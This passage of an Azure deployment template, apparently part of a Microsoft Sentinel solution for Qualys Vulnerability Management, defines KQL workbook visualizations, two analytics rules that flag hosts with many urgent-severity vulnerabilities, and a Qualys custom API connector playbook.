Detected\",\"type\":2,\"query\":\"QualysHostDetectionV2_CL\\r\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\r\\n| extend Sev = tostring(Severity_s)\\r\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\r\\n| extend Vuln = tostring(QID_s)\\r\\n| distinct Vuln\\r\\n\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"}],\"style\":\"formVertical\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\"},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"name\":\"parameters - 10\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Vuln = tostring(QID_s)\\n| where Vuln in (\\\"{Vuln}\\\") or '*' in (\\\"{Vuln}\\\")\\n| summarize ['5 - Urgent'] = countif(Sev == \\\"5\\\"), ['4 - Critical'] = countif(Sev == \\\"4\\\"), ['3 - Serious'] = countif(Sev == \\\"3\\\"), ['2 - Medium'] = countif(Sev == \\\"2\\\"), ['1 - Minimal'] = countif(Sev == \\\"1\\\"), count() by bin(TimeGenerated, {TimeRange:grain})\\n| project-away count_\\n\\n\",\"size\":0,\"title\":\"Detection Timeline\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"barchart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"name\":\"query - 2 - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Status = tostring(Status_s)\\n| extend Vulnerability = tostring(QID_s)\\n| where Vulnerability in (\\\"{Vuln}\\\") or '*' in (\\\"{Vuln}\\\") \\n| summarize count() by Status\\n\\n\",\"size\":0,\"title\":\"Detection Status\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"piechart\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"5 - Urgent\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redBright\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"4 - Critical\",\"formatter\":8,\"formatOptions\":{\"palette\":\"redDark\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"3 - Serious\",\"formatter\":8,\"formatOptions\":{\"palette\":\"orange\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"2 - Medium\",\"formatter\":8,\"formatOptions\":{\"palette\":\"magenta\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":true,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"1 - Minimal\",\"formatter\":8,\"formatOptions\":{\"palette\":\"blue\",\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}},{\"columnMatch\":\"Total\",\"formatter\":3,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"useGrouping\":false,\"maximumFractionDigits\":2}}}],\"labelSettings\":[{\"columnId\":\"5 - Urgent\"},{\"columnId\":\"4 - Critical\"},{\"columnId\":\"3 - Serious\"},{\"columnId\":\"2 - Medium\"},{\"columnId\":\"1 - Minimal\"}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2},\"chartSettings\":{\"seriesLabelSettings\":[{\"seriesName\":\"5 - Urgent\",\"color\":\"redBright\"},{\"seriesName\":\"4 - Critical\",\"color\":\"redDark\"},{\"seriesName\":\"3 - Serious\",\"color\":\"orange\"},{\"seriesName\":\"2 - Medium\",\"color\":\"magenta\"},{\"seriesName\":\"1 - Minimal\",\"color\":\"lightBlue\"}]}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"customWidth\":\"50\",\"name\":\"query - 2 - Copy - Copy\"},{\"type\":3,\"content\":{\"version\":\"KqlItem/1.0\",\"query\":\"QualysHostDetectionV2_CL\\n| where OperatingSystem_s in ({OperatingSystem}) or '*' in ({OperatingSystem})\\n| extend Sev = tostring(Severity_s)\\n| where Sev in ({severitySelector}) or '*' in ({severitySelector})\\n| extend Vulnerability = tostring(QID_s)\\n| where Vulnerability in (\\\"{Vuln}\\\") or '*' in (\\\"{Vuln}\\\")\\n| summarize Total = count() by IPAddress, DnsName_s\\n| sort by Total desc\\n\\n\\n\\n\",\"size\":0,\"title\":\"Host(s) with Vulnerability Detected\",\"timeContext\":{\"durationMs\":0},\"timeContextFromParameter\":\"TimeRange\",\"queryType\":0,\"resourceType\":\"microsoft.operationalinsights/workspaces\",\"visualization\":\"table\",\"gridSettings\":{\"formatters\":[{\"columnMatch\":\"Severity\",\"formatter\":18,\"formatOptions\":{\"showIcon\":true,\"thresholdsOptions\":\"colors\",\"thresholdsGrid\":[{\"operator\":\"==\",\"thresholdValue\":\"5 - Urgent\",\"representation\":\"redBright\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"4 - Critical\",\"representation\":\"redDark\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"3 - Serious\",\"representation\":\"orange\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"2 - Medium\",\"representation\":\"magenta\",\"text\":\"{0}{1}\"},{\"operator\":\"==\",\"thresholdValue\":\"1 - Minimal\",\"representation\":\"lightBlue\",\"text\":\"{0}{1}\"},{\"operator\":\"Default\",\"text\":\"{0}{1}\"}]}},{\"columnMatch\":\"Total\",\"formatter\":0,\"formatOptions\":{\"showIcon\":true},\"numberFormat\":{\"unit\":17,\"options\":{\"style\":\"decimal\",\"maximumFractionDigits\":2}}}]},\"tileSettings\":{\"titleContent\":{\"columnMatch\":\"Severity\",\"formatter\":1,\"formatOptions\":{\"showIcon\":true}},\"leftContent\":{\"columnMatch\":\"count_\",\"formatter\":12,\"formatOptions\":{\"palette\":\"hotCold\",\"showIcon\":true}},\"showBorder\":false,\"sortOrderField\":2}},\"conditionalVisibility\":{\"parameterName\":\"selectedTab\",\"comparison\":\"isEqualTo\",\"value\":\"VulnerabilityAnalysis\"},\"customWidth\":\"50\",\"name\":\"query - 2 -\"}],\"fromTemplateId\":\"sentinel-QualysVMV2Workbook\",\"$schema\":\"https://github.com/Microsoft/Application-Insights-Workbooks/blob/master/schema/workbook.json\"}\r\n", + "version": "1.0", + "sourceId": "[variables('workspaceResourceId')]", + "category": "sentinel" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('Workbook-', last(split(variables('workbookId1'),'/'))))]", + "properties": { + "description": "@{workbookKey=QualysVMV2Workbook; logoFileName=qualys_logo.svg; description=Gain insight into Qualys Vulnerability Management by analyzing, collecting and correlating vulnerability data.\nThis workbook provides visibility into vulnerabilities detected from vulnerability scans; dataTypesDependencies=System.Object[]; dataConnectorsDependencies=System.Object[]; previewImagesFileNames=System.Object[]; version=1.0.0; title=Qualys Vulnerability Management; templateRelativePath=QualysVMv2.json; subtitle=; provider=Qualys}.description", + "parentId": "[variables('workbookId1')]", + "contentId": "[variables('_workbookContentId1')]", + "kind": "Workbook", + "version": "[variables('workbookVersion1')]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + }, + "dependencies": { + "operator": "AND", + "criteria": [ + { + "contentId": "QualysHostDetectionV2_CL", + "kind": "DataType" + }, + { + "contentId": "QualysVulnerabilityManagement", + "kind": "DataConnector" + } + ] + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('_workbookContentId1')]", + "contentKind": "Workbook", + "displayName": "[parameters('workbook1-name')]", + "contentProductId": "[variables('_workbookcontentProductId1')]", + "id": "[variables('_workbookcontentProductId1')]", + "version": "[variables('workbookVersion1')]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('analyticRuleObject1').analyticRuleTemplateSpecName1]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "HighNumberofVulnDetectedV2_AnalyticalRules Analytics Rule with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('analyticRuleObject1').analyticRuleVersion1]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.SecurityInsights/AlertRuleTemplates", + "name": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "apiVersion": "2023-02-01-preview", + "kind": "Scheduled", + "location": "[parameters('workspace-location')]", + "properties": { + "description": "This Creates an incident when a host has a high number of Urgent, severity 5, vulnerabilities detected.", + "displayName": "High Number of Urgent Vulnerabilities Detected", + "enabled": false, + "query": "let threshold = 10;\nQualysHostDetectionV2_CL\n| where Severity_s == \"5\"\n| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated), count() by NetBios_s, IPAddress\n| where count_ >= threshold\n| extend timestamp = StartTime, HostCustomEntity = NetBios_s, IPCustomEntity = IPAddress\n", + "queryFrequency": "PT1H", + "queryPeriod": "PT1H", + "severity": "Medium", + "suppressionDuration": "PT1H", + "suppressionEnabled": false, + "triggerOperator": "GreaterThan", + "triggerThreshold": 0, + "status": "Available", + "requiredDataConnectors": [ + { + "dataTypes": [ + "QualysHostDetection_CL" + ], + "connectorId": "QualysVulnerabilityManagement" + } + ], + "tactics": [ + "InitialAccess" + ], + "techniques": [ + "T1190" + ], + "entityMappings": [ + { + "fieldMappings": [ + { + "columnName": "HostCustomEntity", + "identifier": "FullName" + } + ], + "entityType": "Host" + }, + { + "fieldMappings": [ + { + "columnName": "IPCustomEntity", + "identifier": "Address" + } + ], + "entityType": "IP" + } + ] + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('AnalyticsRule-', last(split(variables('analyticRuleObject1').analyticRuleId1,'/'))))]", + "properties": { + "description": "QualysVM Analytics Rule 1", + "parentId": "[variables('analyticRuleObject1').analyticRuleId1]", + "contentId": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "kind": "AnalyticsRule", + "version": "[variables('analyticRuleObject1').analyticRuleVersion1]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('analyticRuleObject1')._analyticRulecontentId1]", + "contentKind": "AnalyticsRule", + "displayName": "High Number of Urgent Vulnerabilities Detected", + "contentProductId": "[variables('analyticRuleObject1')._analyticRulecontentProductId1]", + "id": "[variables('analyticRuleObject1')._analyticRulecontentProductId1]", + "version": "[variables('analyticRuleObject1').analyticRuleVersion1]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('analyticRuleObject2').analyticRuleTemplateSpecName2]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "NewHighSeverityVulnDetectedAcrossMulitpleHostsV2_AnalyticalRules Analytics Rule with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('analyticRuleObject2').analyticRuleVersion2]", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.SecurityInsights/AlertRuleTemplates", + "name": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "apiVersion": "2023-02-01-preview", + "kind": "Scheduled", + "location": "[parameters('workspace-location')]", + "properties": { + "description": "This creates an incident when a new high severity vulnerability is detected across multilple hosts", + "displayName": "New High Severity Vulnerability Detected Across Multiple Hosts", + "enabled": false, + "query": "let threshold = 10;\nQualysHostDetectionV2_CL\n| extend Status = tostring(Status_s), Vulnerability = tostring(QID_s), Severity = tostring(Severity_s)\n| where Status =~ \"New\" and Severity == \"5\"\n| summarize StartTime = min(TimeGenerated), EndTime = max(TimeGenerated), dcount(NetBios_s) by tostring(QID_s)\n| where dcount_NetBios_s >= threshold\n| extend timestamp = StartTime\n", + "queryFrequency": "PT1H", + "queryPeriod": "PT1H", + "severity": "Medium", + "suppressionDuration": "PT1H", + "suppressionEnabled": false, + "triggerOperator": "GreaterThan", + "triggerThreshold": 0, + "status": "Available", + "requiredDataConnectors": [ + { + "dataTypes": [ + "QualysHostDetection_CL" + ], + "connectorId": "QualysVulnerabilityManagement" + } + ], + "tactics": [ + "InitialAccess" + ], + "techniques": [ + "T1190" + ] + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/metadata", + "apiVersion": "2022-01-01-preview", + "name": "[concat(parameters('workspace'),'/Microsoft.SecurityInsights/',concat('AnalyticsRule-', last(split(variables('analyticRuleObject2').analyticRuleId2,'/'))))]", + "properties": { + "description": "QualysVM Analytics Rule 2", + "parentId": "[variables('analyticRuleObject2').analyticRuleId2]", + "contentId": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "kind": "AnalyticsRule", + "version": "[variables('analyticRuleObject2').analyticRuleVersion2]", + "source": { + "kind": "Solution", + "name": "QualysVM", + "sourceId": "[variables('_solutionId')]" + }, + "author": { + "name": "Microsoft", + "email": "[variables('_email')]" + }, + "support": { + "name": "Microsoft Corporation", + "email": "support@microsoft.com", + "tier": "Microsoft", + "link": "https://support.microsoft.com" + } + } + } + ] + }, + "packageKind": "Solution", + "packageVersion": "[variables('_solutionVersion')]", + "packageName": "[variables('_solutionName')]", + "packageId": "[variables('_solutionId')]", + "contentSchemaVersion": "3.0.0", + "contentId": "[variables('analyticRuleObject2')._analyticRulecontentId2]", + "contentKind": "AnalyticsRule", + "displayName": "New High Severity Vulnerability Detected Across Multiple Hosts", + "contentProductId": "[variables('analyticRuleObject2')._analyticRulecontentProductId2]", + "id": "[variables('analyticRuleObject2')._analyticRulecontentProductId2]", + "version": "[variables('analyticRuleObject2').analyticRuleVersion2]" + } + }, + { + "type": "Microsoft.OperationalInsights/workspaces/providers/contentTemplates", + "apiVersion": "2023-04-01-preview", + "name": "[variables('playbookTemplateSpecName1')]", + "location": "[parameters('workspace-location')]", + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.OperationalInsights/workspaces', parameters('workspace')), 'Microsoft.SecurityInsights/contentPackages', variables('_solutionId'))]" + ], + "properties": { + "description": "QualysCustomConnector Playbook with template version 3.0.0", + "mainTemplate": { + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "[variables('playbookVersion1')]", + "parameters": { + "Connector Name": { + "defaultValue": "QualysCustomConnector", + "type": "String", + "metadata": { + "description": "Name of the custom Qualys Connector." + } + }, + "Service Endpoint": { + "defaultValue": "https://", + "type": "String", + "metadata": { + "description": "Enter the Qualys API Endpoint, Make sure to prefix with https:// e.g. https://qualysapi.qualys.com" + } + } + }, + "variables": { + "operationId-GetPortalDetails": "GetPortalDetails", + "_operationId-GetPortalDetails": "[[variables('operationId-GetPortalDetails')]", + "operationId-GetDetectionsByIP": "GetDetectionsByIP", + "_operationId-GetDetectionsByIP": "[[variables('operationId-GetDetectionsByIP')]", + "operationId-GetAssetDetailsByIP": "GetAssetDetailsByIP", + "_operationId-GetAssetDetailsByIP": "[[variables('operationId-GetAssetDetailsByIP')]", + "operationId-AddIPForScanning": "AddIPForScanning", + "_operationId-AddIPForScanning": "[[variables('operationId-AddIPForScanning')]", + "operationId-ReportOperations": "ReportOperations", + "_operationId-ReportOperations": "[[variables('operationId-ReportOperations')]", + "operationId-VMScanOperations": "VMScanOperations", + "_operationId-VMScanOperations": "[[variables('operationId-VMScanOperations')]", + "operationId-OptionProfileOperations": "OptionProfileOperations", + "_operationId-OptionProfileOperations": "[[variables('operationId-OptionProfileOperations')]", + "operationId-ListScannerAppliances": "ListScannerAppliances", + "_operationId-ListScannerAppliances": "[[variables('operationId-ListScannerAppliances')]", + "operationId-ScanReportTemplateOperations": "ScanReportTemplateOperations", + "_operationId-ScanReportTemplateOperations": "[[variables('operationId-ScanReportTemplateOperations')]", + "operationId-DynamicSearchListOperations": "DynamicSearchListOperations", + "_operationId-DynamicSearchListOperations": "[[variables('operationId-DynamicSearchListOperations')]", + "operationId-SearchAssetByCriteria": "SearchAssetByCriteria", + "_operationId-SearchAssetByCriteria": "[[variables('operationId-SearchAssetByCriteria')]", + "operationId-AssetCountByCriteria": "AssetCountByCriteria", + "_operationId-AssetCountByCriteria": "[[variables('operationId-AssetCountByCriteria')]", + "workspace-location-inline": "[concat('[resourceGroup().locatio', 'n]')]", + "playbookContentId1": "QualysCustomConnector", + "playbookId1": "[[resourceId('Microsoft.Web/customApis', parameters('Connector Name'))]", + "workspace-name": "[parameters('workspace')]", + "workspaceResourceId": "[[resourceId('microsoft.OperationalInsights/Workspaces', variables('workspace-name'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/customApis", + "apiVersion": "2016-06-01", + "name": "[[parameters('Connector Name')]", + "location": "[[variables('workspace-location-inline')]", + "properties": { + "connectionParameters": { + "Username": { + "type": "securestring" + }, + "Password": { + "type": "securestring" + } + }, + "backendService": { + "serviceUrl": "[[parameters('Service EndPoint')]" + }, + "brandColor": "#FFFFFF", + "capabilities": "[variables('TemplateEmptyArray')]", + "description": "Qualys VM is a cloud-based service that provides users immediate global visibility into IT inventory vulnerabilities and helps continuously monitor latest Internet threats.", + "displayName": "[[parameters('Connector Name')]", + "iconUri": "data:image/png;base64,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